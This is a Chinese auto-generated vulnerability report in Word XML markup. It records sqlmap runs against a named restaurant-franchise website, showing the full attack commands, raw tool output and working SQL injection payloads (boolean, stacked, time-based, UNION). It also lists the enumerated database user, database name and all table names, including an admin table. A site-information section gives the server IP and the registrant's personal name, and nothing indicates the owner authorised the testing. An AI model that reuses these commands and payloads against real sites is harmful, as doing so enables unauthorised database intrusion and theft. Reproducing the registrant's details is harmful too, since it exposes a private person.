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wap.098.cn/Public/index/cid/165/id/412*.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">执行命令:python sqlmap.py -u http://wap.098.cn/Public/index/cid/165/id/412*.html --random-agent --dbs  --current-user --current-db --is-db </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t>注入参数(方式) : #1* (URI)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : boolean-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : AND boolean-based blind - WHERE or HAVING clause</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : http://wap.098.cn:80/Public/index/cid/165/id/412') AND 7082=7082 AND ('qXvK'='qXvK.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : stacked queries</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : MySQL &gt; 5.0.11 stacked queries</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : http://wap.098.cn:80/Public/index/cid/165/id/412');SELECT SLEEP(5) AND ('CteN'='CteN.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : AND/OR time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : MySQL &gt;= 5.0.12 AND time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : http://wap.098.cn:80/Public/index/cid/165/id/412') AND SLEEP(5) AND ('Bphm'='Bphm.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : UNION query</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : Generic UNION query (NULL) - 4 columns</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : http://wap.098.cn:80/Public/index/cid/165/id/412') UNION ALL SELECT NULL,NULL,CONCAT(0x716a787671,0x6a614a65476d77426271625a6368716a636667704d4f514771556452586b4d6a51516c6c6870716e,0x7171706a71),NULL-- JRlD.html</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>数据库类型 : MySQL</w:t>
        <w:br/>
        <w:t>服务器语言 : ThinkPHP, Nginx 1.0.14</w:t>
        <w:br/>
        <w:t>数据库版本 : MySQL &gt; 5.0.11</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>网站信息报表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>百度权重  1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站主页  http://wap.098.cn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">网站描述  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站标题  098餐饮加盟网_致力于打造安全健康的餐饮加盟平台</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>IP__坐标  广东省佛山市 电信</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>所属__IP  183.61.146.106</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站年龄  13年10月19天（创建于2005年06月13日,过期时间为2026年06月13日)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案编号  皖ICP备14002173号-2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案性质  个人</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案名称  童为忠</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案时间  2014/2/26 0:00:00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>百度收录  3万7900</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>协议类型  HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">页面类型   text/html; charset=UTF-8  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">服务类型   nginx/1.0.14 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>程序语言  暂无信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>网站漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>执行命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python sqlmap.py -u http://wap.098.cn/Public/index/cid/165/id/412*.html --random-agent --dbs  --current-user --current-db --is-db </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>返回结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="XiaoLv"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ___</w:t>
        <w:br/>
        <w:t xml:space="preserve">       __H__</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ___ ___[']_____ ___ ___  {1.2.11.6#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22:20:50 /2019-05-02/</w:t>
        <w:br/>
        <w:br/>
        <w:t>[22:20:50] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; el) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1' from file 'C:\CODE\个人作品源代码\GET_SQL\ExtrAct-SQL_0.2\sqlmap\txt\user-agents.txt'</w:t>
        <w:br/>
        <w:t>custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y</w:t>
        <w:br/>
        <w:t>[22:20:51] [INFO] testing connection to the target URL</w:t>
        <w:br/>
        <w:t>[22:20:51] [INFO] checking if the target is protected by some kind of WAF/IPS</w:t>
        <w:br/>
        <w:t>[22:20:52] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS</w:t>
        <w:br/>
        <w:t>do you want sqlmap to try to detect backend WAF/IPS? [y/N] N</w:t>
        <w:br/>
        <w:t>[22:20:52] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')</w:t>
        <w:br/>
        <w:t>[22:20:52] [INFO] testing if the target URL content is stable</w:t>
        <w:br/>
        <w:t>[22:20:53] [INFO] target URL content is stable</w:t>
        <w:br/>
        <w:t>[22:20:53] [INFO] testing if URI parameter '#1*' is dynamic</w:t>
        <w:br/>
        <w:t>[22:20:54] [INFO] URI parameter '#1*' appears to be dynamic</w:t>
        <w:br/>
        <w:t>[22:20:54] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable</w:t>
        <w:br/>
        <w:t>[22:20:55] [INFO] testing for SQL injection on URI parameter '#1*'</w:t>
        <w:br/>
        <w:t>[22:20:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'</w:t>
        <w:br/>
        <w:t xml:space="preserve">[22:21:01] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable </w:t>
        <w:br/>
        <w:t xml:space="preserve">[22:21:10] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' </w:t>
        <w:br/>
        <w:t>it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y</w:t>
        <w:br/>
        <w:t>for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y</w:t>
        <w:br/>
        <w:t>[22:21:10] [INFO] testing 'MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'</w:t>
        <w:br/>
        <w:t>[22:21:10] [INFO] testing 'MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'</w:t>
        <w:br/>
        <w:t>[22:21:11] [INFO] testing 'MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'</w:t>
        <w:br/>
        <w:t>[22:21:12] [INFO] testing 'MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (EXP)'</w:t>
        <w:br/>
        <w:t>[22:21:12] [INFO] testing 'MySQL &gt;= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'</w:t>
        <w:br/>
        <w:t>[22:21:13] [INFO] testing 'MySQL &gt;= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'</w:t>
        <w:br/>
        <w:t>[22:21:13] [INFO] testing 'MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'</w:t>
        <w:br/>
        <w:t>[22:21:14] [INFO] testing 'MySQL &gt;= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'</w:t>
        <w:br/>
        <w:t>[22:21:14] [INFO] testing 'MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'</w:t>
        <w:br/>
        <w:t>[22:21:15] [INFO] testing 'MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'</w:t>
        <w:br/>
        <w:t>[22:21:16] [INFO] testing 'MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'</w:t>
        <w:br/>
        <w:t>[22:21:16] [INFO] testing 'MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'</w:t>
        <w:br/>
        <w:t>[22:21:17] [INFO] testing 'MySQL &gt;= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'</w:t>
        <w:br/>
        <w:t>[22:21:17] [INFO] testing 'MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'</w:t>
        <w:br/>
        <w:t>[22:21:18] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'</w:t>
        <w:br/>
        <w:t>[22:21:19] [INFO] testing 'MySQL &gt;= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'</w:t>
        <w:br/>
        <w:t>[22:21:20] [INFO] testing 'MySQL &gt;= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'</w:t>
        <w:br/>
        <w:t>[22:21:20] [INFO] testing 'MySQL &gt;= 5.5 error-based - Parameter replace (EXP)'</w:t>
        <w:br/>
        <w:t>[22:21:20] [INFO] testing 'MySQL &gt;= 5.7.8 error-based - Parameter replace (JSON_KEYS)'</w:t>
        <w:br/>
        <w:t>[22:21:20] [INFO] testing 'MySQL &gt;= 5.0 error-based - Parameter replace (FLOOR)'</w:t>
        <w:br/>
        <w:t>[22:21:20] [INFO] testing 'MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)'</w:t>
        <w:br/>
        <w:t>[22:21:20] [INFO] testing 'MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)'</w:t>
        <w:br/>
        <w:t>[22:21:20] [INFO] testing 'MySQL inline queries'</w:t>
        <w:br/>
        <w:t>[22:21:20] [INFO] testing 'MySQL &gt; 5.0.11 stacked queries (comment)'</w:t>
        <w:br/>
        <w:t>[22:21:21] [INFO] testing 'MySQL &gt; 5.0.11 stacked queries'</w:t>
        <w:br/>
        <w:t xml:space="preserve">[22:21:34] [INFO] URI parameter '#1*' appears to be 'MySQL &gt; 5.0.11 stacked queries' injectable </w:t>
        <w:br/>
        <w:t>[22:21:34] [INFO] testing 'MySQL &gt;= 5.0.12 AND time-based blind'</w:t>
        <w:br/>
        <w:t xml:space="preserve">[22:21:54] [INFO] URI parameter '#1*' appears to be 'MySQL &gt;= 5.0.12 AND time-based blind' injectable </w:t>
        <w:br/>
        <w:t>[22:21:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'</w:t>
        <w:br/>
        <w:t>[22:21:54] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found</w:t>
        <w:br/>
        <w:t>[22:21:56] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test</w:t>
        <w:br/>
        <w:t>[22:21:59] [INFO] target URL appears to have 4 columns in query</w:t>
        <w:br/>
        <w:t>[22:22:13] [INFO] target URL appears to be UNION injectable with 4 columns</w:t>
        <w:br/>
        <w:t>[22:22:15] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable</w:t>
        <w:br/>
        <w:t>URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N</w:t>
        <w:br/>
        <w:t>sqlmap identified the following injection point(s) with a total of 75 HTTP(s) requests:</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t>Parameter: #1* (URI)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Type: boolean-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: AND boolean-based blind - WHERE or HAVING clause</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: http://wap.098.cn:80/Public/index/cid/165/id/412') AND 7082=7082 AND ('qXvK'='qXvK.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    Type: stacked queries</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: MySQL &gt; 5.0.11 stacked queries</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: http://wap.098.cn:80/Public/index/cid/165/id/412');SELECT SLEEP(5) AND ('CteN'='CteN.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    Type: AND/OR time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: MySQL &gt;= 5.0.12 AND time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: http://wap.098.cn:80/Public/index/cid/165/id/412') AND SLEEP(5) AND ('Bphm'='Bphm.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    Type: UNION query</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: Generic UNION query (NULL) - 4 columns</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: http://wap.098.cn:80/Public/index/cid/165/id/412') UNION ALL SELECT NULL,NULL,CONCAT(0x716a787671,0x6a614a65476d77426271625a6368716a636667704d4f514771556452586b4d6a51516c6c6870716e,0x7171706a71),NULL-- JRlD.html</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t>[22:22:15] [INFO] the back-end DBMS is MySQL</w:t>
        <w:br/>
        <w:t>web application technology: ThinkPHP, Nginx 1.0.14</w:t>
        <w:br/>
        <w:t>back-end DBMS: MySQL &gt; 5.0.11</w:t>
        <w:br/>
        <w:t>[22:22:15] [INFO] fetching current user</w:t>
        <w:br/>
        <w:t>current user:    'gw098_sql@localhost'</w:t>
        <w:br/>
        <w:t>[22:22:16] [INFO] fetching current database</w:t>
        <w:br/>
        <w:t>current database:    'gw098_sql'</w:t>
        <w:br/>
        <w:t>[22:22:16] [INFO] testing if current user is DBA</w:t>
        <w:br/>
        <w:t>[22:22:16] [INFO] fetching current user</w:t>
        <w:br/>
        <w:t>[22:22:17] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'</w:t>
        <w:br/>
        <w:t>current user is DBA:    False</w:t>
        <w:br/>
        <w:t>[22:22:17] [INFO] fetching database names</w:t>
        <w:br/>
        <w:t>available databases [2]:</w:t>
        <w:br/>
        <w:t>[*] gw098_sql</w:t>
        <w:br/>
        <w:t>[*] information_schema</w:t>
        <w:br/>
        <w:br/>
        <w:t>[22:22:18] [WARNING] HTTP error codes detected during run:</w:t>
        <w:br/>
        <w:t>404 (Not Found) - 51 times</w:t>
        <w:br/>
        <w:t>[22:22:18] [INFO] fetched data logged to text files under 'C:\Users\langzi\.sqlmap\output\wap.098.cn'</w:t>
        <w:br/>
        <w:br/>
        <w:t>[*] ending @ 22:22:18 /2019-05-02/</w:t>
        <w:br/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>敏感数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t>注入参数(方式) : #1* (URI)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : boolean-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : AND boolean-based blind - WHERE or HAVING clause</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : http://wap.098.cn:80/Public/index/cid/165/id/412') AND 7082=7082 AND ('qXvK'='qXvK.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : stacked queries</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : MySQL &gt; 5.0.11 stacked queries</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : http://wap.098.cn:80/Public/index/cid/165/id/412');SELECT SLEEP(5) AND ('CteN'='CteN.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : AND/OR time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : MySQL &gt;= 5.0.12 AND time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : http://wap.098.cn:80/Public/index/cid/165/id/412') AND SLEEP(5) AND ('Bphm'='Bphm.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : UNION query</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : Generic UNION query (NULL) - 4 columns</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : http://wap.098.cn:80/Public/index/cid/165/id/412') UNION ALL SELECT NULL,NULL,CONCAT(0x716a787671,0x6a614a65476d77426271625a6368716a636667704d4f514771556452586b4d6a51516c6c6870716e,0x7171706a71),NULL-- JRlD.html</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>数据库类型 : MySQL</w:t>
        <w:br/>
        <w:t>服务器语言 : ThinkPHP, Nginx 1.0.14</w:t>
        <w:br/>
        <w:t>数据库版本 : MySQL &gt; 5.0.11</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>当前用户:    'gw098_sql@localhost'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>当前数据库:    'gw098_sql'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>是否有DBA权限:    False</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>所有数据库:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>[*] gw098_sql</w:t>
        <w:br/>
        <w:t>[*] information_schema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>执行命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python sqlmap.py -u http://wap.098.cn/Public/index/cid/165/id/412*.html -D gw098_sql --tables --random-agent </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>返回结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="XiaoLv"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ___</w:t>
        <w:br/>
        <w:t xml:space="preserve">       __H__</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ___ ___[,]_____ ___ ___  {1.2.11.6#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22:22:43 /2019-05-02/</w:t>
        <w:br/>
        <w:br/>
        <w:t>[22:22:43] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8) Gecko/20051111 Firefox/1.5 Ubuntu' from file 'C:\CODE\个人作品源代码\GET_SQL\ExtrAct-SQL_0.2\sqlmap\txt\user-agents.txt'</w:t>
        <w:br/>
        <w:t>custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y</w:t>
        <w:br/>
        <w:t xml:space="preserve">[22:22:44] [INFO] resuming back-end DBMS 'mysql' </w:t>
        <w:br/>
        <w:t>[22:22:44] [INFO] testing connection to the target URL</w:t>
        <w:br/>
        <w:t>[22:22:45] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS</w:t>
        <w:br/>
        <w:t>sqlmap resumed the following injection point(s) from stored session:</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t>Parameter: #1* (URI)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Type: boolean-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: AND boolean-based blind - WHERE or HAVING clause</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: http://wap.098.cn:80/Public/index/cid/165/id/412') AND 7082=7082 AND ('qXvK'='qXvK.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    Type: stacked queries</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: MySQL &gt; 5.0.11 stacked queries</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: http://wap.098.cn:80/Public/index/cid/165/id/412');SELECT SLEEP(5) AND ('CteN'='CteN.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    Type: AND/OR time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: MySQL &gt;= 5.0.12 AND time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: http://wap.098.cn:80/Public/index/cid/165/id/412') AND SLEEP(5) AND ('Bphm'='Bphm.html</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    Type: UNION query</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: Generic UNION query (NULL) - 4 columns</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: http://wap.098.cn:80/Public/index/cid/165/id/412') UNION ALL SELECT NULL,NULL,CONCAT(0x716a787671,0x6a614a65476d77426271625a6368716a636667704d4f514771556452586b4d6a51516c6c6870716e,0x7171706a71),NULL-- JRlD.html</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t>[22:22:45] [INFO] the back-end DBMS is MySQL</w:t>
        <w:br/>
        <w:t>web application technology: ThinkPHP, Nginx 1.0.14</w:t>
        <w:br/>
        <w:t>back-end DBMS: MySQL &gt; 5.0.11</w:t>
        <w:br/>
        <w:t>[22:22:45] [INFO] fetching tables for database: 'gw098_sql'</w:t>
        <w:br/>
        <w:t>Database: gw098_sql</w:t>
        <w:br/>
        <w:t>[19 tables]</w:t>
        <w:br/>
        <w:t>+--------------------------+</w:t>
        <w:br/>
        <w:t>| hzpcms_admin             |</w:t>
        <w:br/>
        <w:t>| hzpcms_adv               |</w:t>
        <w:br/>
        <w:t>| hzpcms_adv_detail        |</w:t>
        <w:br/>
        <w:t>| hzpcms_article           |</w:t>
        <w:br/>
        <w:t>| hzpcms_attachment        |</w:t>
        <w:br/>
        <w:t>| hzpcms_auth_group        |</w:t>
        <w:br/>
        <w:t>| hzpcms_auth_group_access |</w:t>
        <w:br/>
        <w:t>| hzpcms_auth_rule         |</w:t>
        <w:br/>
        <w:t>| hzpcms_category          |</w:t>
        <w:br/>
        <w:t>| hzpcms_config            |</w:t>
        <w:br/>
        <w:t>| hzpcms_gallery           |</w:t>
        <w:br/>
        <w:t>| hzpcms_itemgroup         |</w:t>
        <w:br/>
        <w:t>| hzpcms_iteminfo          |</w:t>
        <w:br/>
        <w:t>| hzpcms_link              |</w:t>
        <w:br/>
        <w:t>| hzpcms_message           |</w:t>
        <w:br/>
        <w:t>| hzpcms_meta              |</w:t>
        <w:br/>
        <w:t>| hzpcms_model             |</w:t>
        <w:br/>
        <w:t>| hzpcms_product           |</w:t>
        <w:br/>
        <w:t>| hzpcms_special           |</w:t>
        <w:br/>
        <w:t>+--------------------------+</w:t>
        <w:br/>
        <w:br/>
        <w:t>[22:22:46] [INFO] fetched data logged to text files under 'C:\Users\langzi\.sqlmap\output\wap.098.cn'</w:t>
        <w:br/>
        <w:br/>
        <w:t>[*] ending @ 22:22:46 /2019-05-02/</w:t>
        <w:br/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>敏感数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>当前数据库下存在如下表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>Database: gw098_sql</w:t>
        <w:br/>
        <w:t>[19 tables]</w:t>
        <w:br/>
        <w:t>+--------------------------+</w:t>
        <w:br/>
        <w:t>| hzpcms_admin             |</w:t>
        <w:br/>
        <w:t>| hzpcms_adv               |</w:t>
        <w:br/>
        <w:t>| hzpcms_adv_detail        |</w:t>
        <w:br/>
        <w:t>| hzpcms_article           |</w:t>
        <w:br/>
        <w:t>| hzpcms_attachment        |</w:t>
        <w:br/>
        <w:t>| hzpcms_auth_group        |</w:t>
        <w:br/>
        <w:t>| hzpcms_auth_group_access |</w:t>
        <w:br/>
        <w:t>| hzpcms_auth_rule         |</w:t>
        <w:br/>
        <w:t>| hzpcms_category          |</w:t>
        <w:br/>
        <w:t>| hzpcms_config            |</w:t>
        <w:br/>
        <w:t>| hzpcms_gallery           |</w:t>
        <w:br/>
        <w:t>| hzpcms_itemgroup         |</w:t>
        <w:br/>
        <w:t>| hzpcms_iteminfo          |</w:t>
        <w:br/>
        <w:t>| hzpcms_link              |</w:t>
        <w:br/>
        <w:t>| hzpcms_message           |</w:t>
        <w:br/>
        <w:t>| hzpcms_meta              |</w:t>
        <w:br/>
        <w:t>| hzpcms_model             |</w:t>
        <w:br/>
        <w:t>| hzpcms_product           |</w:t>
        <w:br/>
        <w:t>| hzpcms_special           |</w:t>
        <w:br/>
        <w:t>+--------------------------+</w:t>
        <w:br/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>复现完成，验证存在SQL注入漏洞</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